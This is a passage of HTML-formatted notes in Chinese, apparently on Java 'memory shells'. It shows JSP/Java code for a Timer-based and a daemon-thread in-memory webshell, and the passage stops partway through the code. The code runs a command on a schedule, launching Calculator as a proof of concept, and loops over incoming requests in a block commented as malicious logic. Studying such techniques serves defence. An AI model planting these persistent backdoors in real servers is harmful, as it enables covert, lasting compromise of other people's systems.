'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">      </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Runtime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getRuntime</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">exec</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"open -a Calculator.app"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">      </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IOException</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">printStackTrace</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">      </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">},</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">10000</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://su18.org/post/memory-shell-2/" target="_blank">https://su18.org/post/memory-shell-2/</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">所谓的 Timer 型内存马，实际上就是想办法在服务器上启动一个永远不会被 GC 的线程，在此线程中定时或循环执行恶意代码，达到内存马的目的。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">创建守护线程同样可以</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Thread</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> d </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Thread</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSystemThreadGroup</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(),</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Runnable</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">run</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// 死循环</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">while</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">true</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// 恶意逻辑</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">List</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> list </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getRequest</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">list</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">size</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">==</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">2</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(!</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">set</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">contains</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">list</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">get</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)))</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                            </span>set</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">add</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">list</span></span></span><span style="mso-bookmark:内存马;"><span 